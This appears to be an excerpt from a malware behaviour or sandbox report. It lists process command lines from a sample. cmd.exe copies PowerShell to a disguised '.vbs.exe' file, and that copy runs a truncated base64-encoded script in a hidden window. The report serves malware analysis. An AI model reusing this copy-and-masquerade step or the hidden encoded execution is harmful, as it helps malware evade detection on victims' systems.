Technical Information
- '<PATH_SAMPLE>.vbs.exe' -enc JABYAHIAeQBoAGoAeQBpACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABl...
- <PATH_SAMPLE>.vbs.exe
- <PATH_SAMPLE>.vbs.exe
- '<SYSTEM32>\cmd.exe' /c copy "%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<PATH_SAMPLE>.vbs.exe" /Y
- '<PATH_SAMPLE>.vbs.exe' -enc JABYAHIAeQBoAGoAeQBpACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABl...' (with hidden window)